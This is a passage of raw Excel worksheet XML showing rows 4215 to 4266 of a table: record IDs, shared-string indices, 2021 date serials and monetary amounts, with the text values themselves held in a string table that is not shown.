        <v>11864</v>
      </c>
      <c r="E4215">
        <v>17</v>
      </c>
      <c r="F4215" t="s">
        <v>9217</v>
      </c>
      <c r="G4215" s="1">
        <v>44287</v>
      </c>
      <c r="H4215">
        <v>1000</v>
      </c>
      <c r="I4215" t="s">
        <v>13454</v>
      </c>
      <c r="J4215" t="s">
        <v>13455</v>
      </c>
    </row>
    <row r="4216" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4216">
        <v>24640</v>
      </c>
      <c r="B4216">
        <v>4819</v>
      </c>
      <c r="C4216" t="s">
        <v>4436</v>
      </c>
      <c r="D4216" t="s">
        <v>16414</v>
      </c>
      <c r="E4216">
        <v>19</v>
      </c>
      <c r="F4216" t="s">
        <v>13456</v>
      </c>
      <c r="G4216" s="1">
        <v>44335</v>
      </c>
      <c r="H4216" s="4">
        <v>360000</v>
      </c>
      <c r="I4216" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="4217" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4217">
        <v>24641</v>
      </c>
      <c r="B4217">
        <v>2124</v>
      </c>
      <c r="C4217" t="s">
        <v>16535</v>
      </c>
      <c r="D4217" t="s">
        <v>16536</v>
      </c>
      <c r="E4217">
        <v>18</v>
      </c>
      <c r="F4217" t="s">
        <v>13457</v>
      </c>
      <c r="G4217" s="1">
        <v>44308</v>
      </c>
      <c r="H4217" s="4">
        <v>500000</v>
      </c>
      <c r="I4217" t="s">
        <v>13458</v>
      </c>
    </row>
    <row r="4218" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4218">
        <v>24642</v>
      </c>
      <c r="B4218">
        <v>2124</v>
      </c>
      <c r="C4218" t="s">
        <v>16535</v>
      </c>
      <c r="D4218" t="s">
        <v>16536</v>
      </c>
      <c r="E4218">
        <v>18</v>
      </c>
      <c r="F4218" t="s">
        <v>13459</v>
      </c>
      <c r="G4218" s="1">
        <v>44308</v>
      </c>
      <c r="H4218" s="4">
        <v>200000</v>
      </c>
      <c r="I4218" t="s">
        <v>13458</v>
      </c>
    </row>
    <row r="4219" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4219">
        <v>24643</v>
      </c>
      <c r="B4219">
        <v>2124</v>
      </c>
      <c r="C4219" t="s">
        <v>16535</v>
      </c>
      <c r="D4219" t="s">
        <v>16536</v>
      </c>
      <c r="E4219">
        <v>18</v>
      </c>
      <c r="F4219" t="s">
        <v>2236</v>
      </c>
      <c r="G4219" s="1">
        <v>44308</v>
      </c>
      <c r="H4219" s="4">
        <v>150000</v>
      </c>
      <c r="I4219" t="s">
        <v>13458</v>
      </c>
    </row>
    <row r="4220" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4220">
        <v>24644</v>
      </c>
      <c r="B4220">
        <v>2124</v>
      </c>
      <c r="C4220" t="s">
        <v>16535</v>
      </c>
      <c r="D4220" t="s">
        <v>16536</v>
      </c>
      <c r="E4220">
        <v>18</v>
      </c>
      <c r="F4220" t="s">
        <v>4686</v>
      </c>
      <c r="G4220" s="1">
        <v>44308</v>
      </c>
      <c r="H4220" s="4">
        <v>150000</v>
      </c>
      <c r="I4220" t="s">
        <v>13458</v>
      </c>
    </row>
    <row r="4221" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4221">
        <v>24645</v>
      </c>
      <c r="B4221">
        <v>1175</v>
      </c>
      <c r="C4221" t="s">
        <v>4484</v>
      </c>
      <c r="D4221" t="s">
        <v>13460</v>
      </c>
      <c r="E4221">
        <v>5</v>
      </c>
      <c r="F4221" t="s">
        <v>11465</v>
      </c>
      <c r="G4221" s="1">
        <v>44301</v>
      </c>
      <c r="H4221">
        <v>40000</v>
      </c>
      <c r="I4221" t="s">
        <v>9638</v>
      </c>
      <c r="J4221" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4222" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4222">
        <v>24646</v>
      </c>
      <c r="B4222">
        <v>1175</v>
      </c>
      <c r="C4222" t="s">
        <v>4484</v>
      </c>
      <c r="D4222" t="s">
        <v>13460</v>
      </c>
      <c r="E4222">
        <v>5</v>
      </c>
      <c r="F4222" t="s">
        <v>13461</v>
      </c>
      <c r="G4222" s="1">
        <v>44301</v>
      </c>
      <c r="H4222">
        <v>40000</v>
      </c>
      <c r="I4222" t="s">
        <v>10518</v>
      </c>
      <c r="J4222" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4223" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4223">
        <v>24647</v>
      </c>
      <c r="B4223">
        <v>5454</v>
      </c>
      <c r="C4223" t="s">
        <v>8693</v>
      </c>
      <c r="D4223" t="s">
        <v>13462</v>
      </c>
      <c r="E4223">
        <v>11</v>
      </c>
      <c r="F4223" t="s">
        <v>2236</v>
      </c>
      <c r="G4223" s="1">
        <v>44307</v>
      </c>
      <c r="H4223">
        <v>200000</v>
      </c>
      <c r="J4223" t="s">
        <v>13463</v>
      </c>
    </row>
    <row r="4224" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4224">
        <v>24648</v>
      </c>
      <c r="B4224">
        <v>5454</v>
      </c>
      <c r="C4224" t="s">
        <v>8693</v>
      </c>
      <c r="D4224" t="s">
        <v>13464</v>
      </c>
      <c r="E4224">
        <v>11</v>
      </c>
      <c r="F4224" t="s">
        <v>4686</v>
      </c>
      <c r="G4224" s="1">
        <v>44307</v>
      </c>
      <c r="H4224">
        <v>10000</v>
      </c>
      <c r="J4224" t="s">
        <v>10871</v>
      </c>
    </row>
    <row r="4225" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4225">
        <v>24649</v>
      </c>
      <c r="B4225">
        <v>5166</v>
      </c>
      <c r="C4225" t="s">
        <v>8722</v>
      </c>
      <c r="D4225" t="s">
        <v>13465</v>
      </c>
      <c r="E4225">
        <v>17</v>
      </c>
      <c r="F4225" t="s">
        <v>3814</v>
      </c>
      <c r="G4225" s="1">
        <v>44341</v>
      </c>
      <c r="H4225">
        <v>0</v>
      </c>
      <c r="I4225" t="s">
        <v>11192</v>
      </c>
      <c r="J4225" t="s">
        <v>13466</v>
      </c>
    </row>
    <row r="4226" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4226">
        <v>24650</v>
      </c>
      <c r="B4226">
        <v>5166</v>
      </c>
      <c r="C4226" t="s">
        <v>8722</v>
      </c>
      <c r="D4226" t="s">
        <v>13465</v>
      </c>
      <c r="E4226">
        <v>17</v>
      </c>
      <c r="F4226" t="s">
        <v>9577</v>
      </c>
      <c r="G4226" s="1">
        <v>44341</v>
      </c>
      <c r="H4226">
        <v>0</v>
      </c>
      <c r="I4226" t="s">
        <v>11192</v>
      </c>
      <c r="J4226" t="s">
        <v>13466</v>
      </c>
    </row>
    <row r="4227" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4227">
        <v>24651</v>
      </c>
      <c r="B4227">
        <v>5166</v>
      </c>
      <c r="C4227" t="s">
        <v>8722</v>
      </c>
      <c r="D4227" t="s">
        <v>13465</v>
      </c>
      <c r="E4227">
        <v>17</v>
      </c>
      <c r="F4227" t="s">
        <v>13467</v>
      </c>
      <c r="G4227" s="1">
        <v>44341</v>
      </c>
      <c r="H4227">
        <v>0</v>
      </c>
      <c r="I4227" t="s">
        <v>11192</v>
      </c>
      <c r="J4227" t="s">
        <v>13466</v>
      </c>
    </row>
    <row r="4228" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4228">
        <v>24652</v>
      </c>
      <c r="B4228">
        <v>5166</v>
      </c>
      <c r="C4228" t="s">
        <v>8722</v>
      </c>
      <c r="D4228" t="s">
        <v>13465</v>
      </c>
      <c r="E4228">
        <v>17</v>
      </c>
      <c r="F4228" t="s">
        <v>13468</v>
      </c>
      <c r="G4228" s="1">
        <v>44341</v>
      </c>
      <c r="H4228">
        <v>0</v>
      </c>
      <c r="I4228" t="s">
        <v>11192</v>
      </c>
      <c r="J4228" t="s">
        <v>13466</v>
      </c>
    </row>
    <row r="4229" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4229">
        <v>24653</v>
      </c>
      <c r="B4229">
        <v>5166</v>
      </c>
      <c r="C4229" t="s">
        <v>8722</v>
      </c>
      <c r="D4229" t="s">
        <v>13465</v>
      </c>
      <c r="E4229">
        <v>17</v>
      </c>
      <c r="F4229" t="s">
        <v>13469</v>
      </c>
      <c r="G4229" s="1">
        <v>44341</v>
      </c>
      <c r="H4229">
        <v>0</v>
      </c>
      <c r="I4229" t="s">
        <v>11192</v>
      </c>
      <c r="J4229" t="s">
        <v>13466</v>
      </c>
    </row>
    <row r="4230" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4230">
        <v>24654</v>
      </c>
      <c r="B4230">
        <v>5166</v>
      </c>
      <c r="C4230" t="s">
        <v>8722</v>
      </c>
      <c r="D4230" t="s">
        <v>13465</v>
      </c>
      <c r="E4230">
        <v>17</v>
      </c>
      <c r="F4230" t="s">
        <v>13470</v>
      </c>
      <c r="G4230" s="1">
        <v>44341</v>
      </c>
      <c r="H4230">
        <v>0</v>
      </c>
      <c r="I4230" t="s">
        <v>11192</v>
      </c>
      <c r="J4230" t="s">
        <v>13466</v>
      </c>
    </row>
    <row r="4231" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4231">
        <v>24658</v>
      </c>
      <c r="B4231">
        <v>2553</v>
      </c>
      <c r="C4231" t="s">
        <v>4964</v>
      </c>
      <c r="D4231" t="s">
        <v>9991</v>
      </c>
      <c r="E4231">
        <v>14</v>
      </c>
      <c r="F4231" t="s">
        <v>9849</v>
      </c>
      <c r="G4231" s="1">
        <v>44302</v>
      </c>
      <c r="H4231">
        <v>80000</v>
      </c>
      <c r="J4231" t="s">
        <v>9572</v>
      </c>
    </row>
    <row r="4232" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4232">
        <v>24659</v>
      </c>
      <c r="B4232">
        <v>5232</v>
      </c>
      <c r="C4232" t="s">
        <v>8663</v>
      </c>
      <c r="D4232" t="s">
        <v>13471</v>
      </c>
      <c r="E4232">
        <v>7</v>
      </c>
      <c r="F4232" t="s">
        <v>4037</v>
      </c>
      <c r="G4232" s="1">
        <v>44309</v>
      </c>
      <c r="H4232">
        <v>500</v>
      </c>
      <c r="I4232" t="s">
        <v>13472</v>
      </c>
      <c r="J4232" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="4233" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4233">
        <v>24660</v>
      </c>
      <c r="B4233">
        <v>5232</v>
      </c>
      <c r="C4233" t="s">
        <v>8663</v>
      </c>
      <c r="D4233" t="s">
        <v>13471</v>
      </c>
      <c r="E4233">
        <v>7</v>
      </c>
      <c r="F4233" t="s">
        <v>11351</v>
      </c>
      <c r="G4233" s="1">
        <v>44309</v>
      </c>
      <c r="H4233">
        <v>400</v>
      </c>
      <c r="I4233" t="s">
        <v>13472</v>
      </c>
    </row>
    <row r="4234" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4234">
        <v>24661</v>
      </c>
      <c r="B4234">
        <v>5480</v>
      </c>
      <c r="C4234" t="s">
        <v>8787</v>
      </c>
      <c r="D4234" t="s">
        <v>13473</v>
      </c>
      <c r="E4234">
        <v>2</v>
      </c>
      <c r="F4234" t="s">
        <v>4062</v>
      </c>
      <c r="G4234" s="1">
        <v>44301</v>
      </c>
      <c r="H4234">
        <v>4000000</v>
      </c>
      <c r="J4234" t="s">
        <v>13474</v>
      </c>
    </row>
    <row r="4235" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4235">
        <v>24662</v>
      </c>
      <c r="B4235">
        <v>5480</v>
      </c>
      <c r="C4235" t="s">
        <v>8787</v>
      </c>
      <c r="D4235" t="s">
        <v>13473</v>
      </c>
      <c r="E4235">
        <v>2</v>
      </c>
      <c r="F4235" t="s">
        <v>13475</v>
      </c>
      <c r="G4235" s="1">
        <v>44301</v>
      </c>
      <c r="H4235">
        <v>300000</v>
      </c>
      <c r="J4235" t="s">
        <v>10328</v>
      </c>
    </row>
    <row r="4236" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4236">
        <v>24663</v>
      </c>
      <c r="B4236">
        <v>5480</v>
      </c>
      <c r="C4236" t="s">
        <v>8787</v>
      </c>
      <c r="D4236" t="s">
        <v>13473</v>
      </c>
      <c r="E4236">
        <v>2</v>
      </c>
      <c r="F4236" t="s">
        <v>9437</v>
      </c>
      <c r="G4236" s="1">
        <v>44301</v>
      </c>
      <c r="H4236">
        <v>2500</v>
      </c>
      <c r="J4236" t="s">
        <v>10328</v>
      </c>
    </row>
    <row r="4237" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4237">
        <v>24664</v>
      </c>
      <c r="B4237">
        <v>5480</v>
      </c>
      <c r="C4237" t="s">
        <v>8787</v>
      </c>
      <c r="D4237" t="s">
        <v>13473</v>
      </c>
      <c r="E4237">
        <v>2</v>
      </c>
      <c r="F4237" t="s">
        <v>13476</v>
      </c>
      <c r="G4237" s="1">
        <v>44301</v>
      </c>
      <c r="H4237">
        <v>600000</v>
      </c>
      <c r="I4237" t="s">
        <v>9550</v>
      </c>
      <c r="J4237" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="4238" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4238">
        <v>24665</v>
      </c>
      <c r="B4238">
        <v>80</v>
      </c>
      <c r="C4238" t="s">
        <v>1543</v>
      </c>
      <c r="D4238" t="s">
        <v>11197</v>
      </c>
      <c r="E4238">
        <v>12</v>
      </c>
      <c r="F4238" t="s">
        <v>609</v>
      </c>
      <c r="G4238" s="1">
        <v>44298</v>
      </c>
      <c r="H4238">
        <v>100000</v>
      </c>
      <c r="I4238" t="s">
        <v>9550</v>
      </c>
      <c r="J4238" t="s">
        <v>13477</v>
      </c>
    </row>
    <row r="4239" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4239">
        <v>24668</v>
      </c>
      <c r="B4239">
        <v>792</v>
      </c>
      <c r="C4239" t="s">
        <v>1944</v>
      </c>
      <c r="D4239" t="s">
        <v>12003</v>
      </c>
      <c r="E4239">
        <v>16</v>
      </c>
      <c r="F4239" t="s">
        <v>9577</v>
      </c>
      <c r="G4239" s="1">
        <v>44298</v>
      </c>
      <c r="H4239">
        <v>60000</v>
      </c>
      <c r="J4239" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4240" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4240">
        <v>24669</v>
      </c>
      <c r="B4240">
        <v>1361</v>
      </c>
      <c r="C4240" t="s">
        <v>4525</v>
      </c>
      <c r="D4240" t="s">
        <v>13478</v>
      </c>
      <c r="E4240">
        <v>16</v>
      </c>
      <c r="F4240" t="s">
        <v>673</v>
      </c>
      <c r="G4240" s="1">
        <v>44319</v>
      </c>
      <c r="H4240">
        <v>0</v>
      </c>
      <c r="J4240" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="4241" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4241">
        <v>24670</v>
      </c>
      <c r="B4241">
        <v>1435</v>
      </c>
      <c r="C4241" t="s">
        <v>3187</v>
      </c>
      <c r="D4241" t="s">
        <v>11700</v>
      </c>
      <c r="E4241">
        <v>16</v>
      </c>
      <c r="F4241" t="s">
        <v>4037</v>
      </c>
      <c r="G4241" s="1">
        <v>44302</v>
      </c>
      <c r="H4241">
        <v>3800</v>
      </c>
      <c r="I4241" t="s">
        <v>13479</v>
      </c>
      <c r="J4241" t="s">
        <v>13480</v>
      </c>
    </row>
    <row r="4242" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4242">
        <v>24671</v>
      </c>
      <c r="B4242">
        <v>1435</v>
      </c>
      <c r="C4242" t="s">
        <v>3187</v>
      </c>
      <c r="D4242" t="s">
        <v>13481</v>
      </c>
      <c r="E4242">
        <v>16</v>
      </c>
      <c r="F4242" t="s">
        <v>13482</v>
      </c>
      <c r="G4242" s="1">
        <v>44302</v>
      </c>
      <c r="H4242">
        <v>3000</v>
      </c>
      <c r="I4242" t="s">
        <v>13483</v>
      </c>
      <c r="J4242" t="s">
        <v>13484</v>
      </c>
    </row>
    <row r="4243" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4243">
        <v>24677</v>
      </c>
      <c r="B4243">
        <v>1990</v>
      </c>
      <c r="C4243" t="s">
        <v>6287</v>
      </c>
      <c r="D4243" t="s">
        <v>12043</v>
      </c>
      <c r="E4243">
        <v>13</v>
      </c>
      <c r="F4243" t="s">
        <v>8913</v>
      </c>
      <c r="G4243" s="1">
        <v>44378</v>
      </c>
      <c r="H4243">
        <v>100000</v>
      </c>
      <c r="I4243" t="s">
        <v>13485</v>
      </c>
      <c r="J4243" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4244" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4244">
        <v>24678</v>
      </c>
      <c r="B4244">
        <v>1990</v>
      </c>
      <c r="C4244" t="s">
        <v>6287</v>
      </c>
      <c r="D4244" t="s">
        <v>12043</v>
      </c>
      <c r="E4244">
        <v>13</v>
      </c>
      <c r="F4244" t="s">
        <v>9460</v>
      </c>
      <c r="G4244" s="1">
        <v>44378</v>
      </c>
      <c r="H4244">
        <v>500000</v>
      </c>
      <c r="I4244" t="s">
        <v>9550</v>
      </c>
      <c r="J4244" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4245" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4245">
        <v>24679</v>
      </c>
      <c r="B4245">
        <v>1990</v>
      </c>
      <c r="C4245" t="s">
        <v>6287</v>
      </c>
      <c r="D4245" t="s">
        <v>12043</v>
      </c>
      <c r="E4245">
        <v>13</v>
      </c>
      <c r="F4245" t="s">
        <v>609</v>
      </c>
      <c r="G4245" s="1">
        <v>44378</v>
      </c>
      <c r="H4245">
        <v>100000</v>
      </c>
      <c r="I4245" t="s">
        <v>9550</v>
      </c>
      <c r="J4245" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4246" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4246">
        <v>24680</v>
      </c>
      <c r="B4246">
        <v>2577</v>
      </c>
      <c r="C4246" t="s">
        <v>5230</v>
      </c>
      <c r="D4246" t="s">
        <v>13486</v>
      </c>
      <c r="E4246">
        <v>12</v>
      </c>
      <c r="F4246" t="s">
        <v>7057</v>
      </c>
      <c r="G4246" s="1">
        <v>44307</v>
      </c>
      <c r="H4246">
        <v>250000</v>
      </c>
      <c r="J4246" t="s">
        <v>11785</v>
      </c>
    </row>
    <row r="4247" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4247">
        <v>24681</v>
      </c>
      <c r="B4247">
        <v>2577</v>
      </c>
      <c r="C4247" t="s">
        <v>5230</v>
      </c>
      <c r="D4247" t="s">
        <v>13486</v>
      </c>
      <c r="E4247">
        <v>12</v>
      </c>
      <c r="F4247" t="s">
        <v>547</v>
      </c>
      <c r="G4247" s="1">
        <v>44307</v>
      </c>
      <c r="H4247">
        <v>75000</v>
      </c>
      <c r="J4247" t="s">
        <v>13487</v>
      </c>
    </row>
    <row r="4248" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4248">
        <v>24704</v>
      </c>
      <c r="B4248">
        <v>2186</v>
      </c>
      <c r="C4248" t="s">
        <v>6100</v>
      </c>
      <c r="D4248" t="s">
        <v>13488</v>
      </c>
      <c r="E4248">
        <v>26</v>
      </c>
      <c r="F4248" t="s">
        <v>364</v>
      </c>
      <c r="G4248" s="1">
        <v>44287</v>
      </c>
      <c r="H4248">
        <v>1500000</v>
      </c>
      <c r="J4248" t="s">
        <v>12846</v>
      </c>
    </row>
    <row r="4249" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4249">
        <v>24707</v>
      </c>
      <c r="B4249">
        <v>5126</v>
      </c>
      <c r="C4249" t="s">
        <v>8170</v>
      </c>
      <c r="D4249" t="s">
        <v>12602</v>
      </c>
      <c r="E4249">
        <v>12</v>
      </c>
      <c r="F4249" t="s">
        <v>8913</v>
      </c>
      <c r="G4249" s="1">
        <v>44274</v>
      </c>
      <c r="H4249">
        <v>100000</v>
      </c>
      <c r="I4249" t="s">
        <v>13489</v>
      </c>
    </row>
    <row r="4250" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4250">
        <v>24710</v>
      </c>
      <c r="B4250">
        <v>4819</v>
      </c>
      <c r="C4250" t="s">
        <v>4436</v>
      </c>
      <c r="D4250" t="s">
        <v>16414</v>
      </c>
      <c r="E4250">
        <v>19</v>
      </c>
      <c r="F4250" t="s">
        <v>13490</v>
      </c>
      <c r="G4250" s="1">
        <v>44335</v>
      </c>
      <c r="H4250" s="4">
        <v>350000</v>
      </c>
      <c r="I4250" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="4251" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4251">
        <v>24711</v>
      </c>
      <c r="B4251">
        <v>112</v>
      </c>
      <c r="C4251" t="s">
        <v>2358</v>
      </c>
      <c r="D4251" t="s">
        <v>13491</v>
      </c>
      <c r="E4251">
        <v>12</v>
      </c>
      <c r="F4251" t="s">
        <v>10463</v>
      </c>
      <c r="G4251" s="1">
        <v>44319</v>
      </c>
      <c r="H4251">
        <v>2500000</v>
      </c>
      <c r="J4251" t="s">
        <v>10037</v>
      </c>
    </row>
    <row r="4252" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4252">
        <v>24712</v>
      </c>
      <c r="B4252">
        <v>112</v>
      </c>
      <c r="C4252" t="s">
        <v>2358</v>
      </c>
      <c r="D4252" t="s">
        <v>13491</v>
      </c>
      <c r="E4252">
        <v>12</v>
      </c>
      <c r="F4252" t="s">
        <v>13492</v>
      </c>
      <c r="G4252" s="1">
        <v>44319</v>
      </c>
      <c r="H4252">
        <v>25000</v>
      </c>
      <c r="J4252" t="s">
        <v>10037</v>
      </c>
    </row>
    <row r="4253" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4253">
        <v>24713</v>
      </c>
      <c r="B4253">
        <v>112</v>
      </c>
      <c r="C4253" t="s">
        <v>2358</v>
      </c>
      <c r="D4253" t="s">
        <v>13491</v>
      </c>
      <c r="E4253">
        <v>12</v>
      </c>
      <c r="F4253" t="s">
        <v>13493</v>
      </c>
      <c r="G4253" s="1">
        <v>44319</v>
      </c>
      <c r="H4253">
        <v>25000</v>
      </c>
      <c r="J4253" t="s">
        <v>10037</v>
      </c>
    </row>
    <row r="4254" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4254">
        <v>24714</v>
      </c>
      <c r="B4254">
        <v>112</v>
      </c>
      <c r="C4254" t="s">
        <v>2358</v>
      </c>
      <c r="D4254" t="s">
        <v>13491</v>
      </c>
      <c r="E4254">
        <v>12</v>
      </c>
      <c r="F4254" t="s">
        <v>9460</v>
      </c>
      <c r="G4254" s="1">
        <v>44319</v>
      </c>
      <c r="H4254">
        <v>25000</v>
      </c>
      <c r="J4254" t="s">
        <v>10037</v>
      </c>
    </row>
    <row r="4255" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4255">
        <v>24715</v>
      </c>
      <c r="B4255">
        <v>2605</v>
      </c>
      <c r="C4255" t="s">
        <v>5690</v>
      </c>
      <c r="D4255" t="s">
        <v>10613</v>
      </c>
      <c r="E4255">
        <v>11</v>
      </c>
      <c r="F4255" t="s">
        <v>8913</v>
      </c>
      <c r="G4255" s="1">
        <v>44344</v>
      </c>
      <c r="H4255">
        <v>100000</v>
      </c>
      <c r="I4255" t="s">
        <v>13485</v>
      </c>
      <c r="J4255" t="s">
        <v>10858</v>
      </c>
    </row>
    <row r="4256" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4256">
        <v>24717</v>
      </c>
      <c r="B4256">
        <v>1257</v>
      </c>
      <c r="C4256" t="s">
        <v>2547</v>
      </c>
      <c r="D4256" t="s">
        <v>12660</v>
      </c>
      <c r="E4256">
        <v>16</v>
      </c>
      <c r="F4256" t="s">
        <v>9472</v>
      </c>
      <c r="G4256" s="1">
        <v>44319</v>
      </c>
      <c r="H4256">
        <v>40000</v>
      </c>
      <c r="J4256" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4257" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4257">
        <v>24718</v>
      </c>
      <c r="B4257">
        <v>1257</v>
      </c>
      <c r="C4257" t="s">
        <v>2547</v>
      </c>
      <c r="D4257" t="s">
        <v>12660</v>
      </c>
      <c r="E4257">
        <v>16</v>
      </c>
      <c r="F4257" t="s">
        <v>9460</v>
      </c>
      <c r="G4257" s="1">
        <v>44319</v>
      </c>
      <c r="H4257">
        <v>4000</v>
      </c>
      <c r="J4257" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4258" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4258">
        <v>24720</v>
      </c>
      <c r="B4258">
        <v>1653</v>
      </c>
      <c r="C4258" t="s">
        <v>4534</v>
      </c>
      <c r="D4258" t="s">
        <v>13494</v>
      </c>
      <c r="E4258">
        <v>29</v>
      </c>
      <c r="F4258" t="s">
        <v>3341</v>
      </c>
      <c r="G4258" s="1">
        <v>44313</v>
      </c>
      <c r="H4258">
        <v>500</v>
      </c>
      <c r="I4258" t="s">
        <v>10991</v>
      </c>
      <c r="J4258" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="4259" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4259">
        <v>24727</v>
      </c>
      <c r="B4259">
        <v>1445</v>
      </c>
      <c r="C4259" t="s">
        <v>4530</v>
      </c>
      <c r="D4259" t="s">
        <v>13495</v>
      </c>
      <c r="E4259">
        <v>5</v>
      </c>
      <c r="F4259" t="s">
        <v>13496</v>
      </c>
      <c r="G4259" s="1">
        <v>44337</v>
      </c>
      <c r="H4259">
        <v>150000</v>
      </c>
      <c r="I4259" t="s">
        <v>10222</v>
      </c>
      <c r="J4259" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4260" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4260">
        <v>24728</v>
      </c>
      <c r="B4260">
        <v>1445</v>
      </c>
      <c r="C4260" t="s">
        <v>4530</v>
      </c>
      <c r="D4260" t="s">
        <v>13495</v>
      </c>
      <c r="E4260">
        <v>5</v>
      </c>
      <c r="F4260" t="s">
        <v>13497</v>
      </c>
      <c r="G4260" s="1">
        <v>44337</v>
      </c>
      <c r="H4260">
        <v>120000</v>
      </c>
      <c r="I4260" t="s">
        <v>10222</v>
      </c>
      <c r="J4260" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4261" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4261">
        <v>24729</v>
      </c>
      <c r="B4261">
        <v>1772</v>
      </c>
      <c r="C4261" t="s">
        <v>6474</v>
      </c>
      <c r="D4261" t="s">
        <v>13498</v>
      </c>
      <c r="E4261">
        <v>32</v>
      </c>
      <c r="F4261" t="s">
        <v>13499</v>
      </c>
      <c r="G4261" s="1">
        <v>44278</v>
      </c>
      <c r="H4261">
        <v>330000</v>
      </c>
      <c r="I4261" t="s">
        <v>9693</v>
      </c>
    </row>
    <row r="4262" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4262">
        <v>24730</v>
      </c>
      <c r="B4262">
        <v>1772</v>
      </c>
      <c r="C4262" t="s">
        <v>6474</v>
      </c>
      <c r="D4262" t="s">
        <v>13498</v>
      </c>
      <c r="E4262">
        <v>32</v>
      </c>
      <c r="F4262" t="s">
        <v>13500</v>
      </c>
      <c r="G4262" s="1">
        <v>44278</v>
      </c>
      <c r="H4262">
        <v>0</v>
      </c>
      <c r="I4262" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="4263" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4263">
        <v>24731</v>
      </c>
      <c r="B4263">
        <v>1772</v>
      </c>
      <c r="C4263" t="s">
        <v>6474</v>
      </c>
      <c r="D4263" t="s">
        <v>13498</v>
      </c>
      <c r="E4263">
        <v>32</v>
      </c>
      <c r="F4263" t="s">
        <v>3763</v>
      </c>
      <c r="G4263" s="1">
        <v>44278</v>
      </c>
      <c r="H4263">
        <v>0</v>
      </c>
      <c r="I4263" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="4264" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4264">
        <v>24732</v>
      </c>
      <c r="B4264">
        <v>1772</v>
      </c>
      <c r="C4264" t="s">
        <v>6474</v>
      </c>
      <c r="D4264" t="s">
        <v>13498</v>
      </c>
      <c r="E4264">
        <v>32</v>
      </c>
      <c r="F4264" t="s">
        <v>2236</v>
      </c>
      <c r="G4264" s="1">
        <v>44278</v>
      </c>
      <c r="H4264">
        <v>24460</v>
      </c>
      <c r="I4264" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="4265" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4265">
        <v>24733</v>
      </c>
      <c r="B4265">
        <v>1772</v>
      </c>
      <c r="C4265" t="s">
        <v>6474</v>
      </c>
      <c r="D4265" t="s">
        <v>13498</v>
      </c>
      <c r="E4265">
        <v>32</v>
      </c>
      <c r="F4265" t="s">
        <v>13501</v>
      </c>
      <c r="G4265" s="1">
        <v>44278</v>
      </c>
      <c r="H4265">
        <v>0</v>
      </c>
      <c r="I4265" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="4266" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4266">
        <v>24737</v>
      </c>
      <c r="B4266">
        <v>927</v>
      </c>
      <c r="C4266" t="s">
        <v>2649</v>
      </c>
      <c r="D4266" t="s">
        <v>12726</v>
      </c>
      <c r="E4266">
        <v>14</v>
      </c>
      <c r="F4266" t="s">
        <v>9849</v>
      </c>
      <c r="G4266" s="1">
        <v>44286</v>
      </c>
      <c r="H4266">
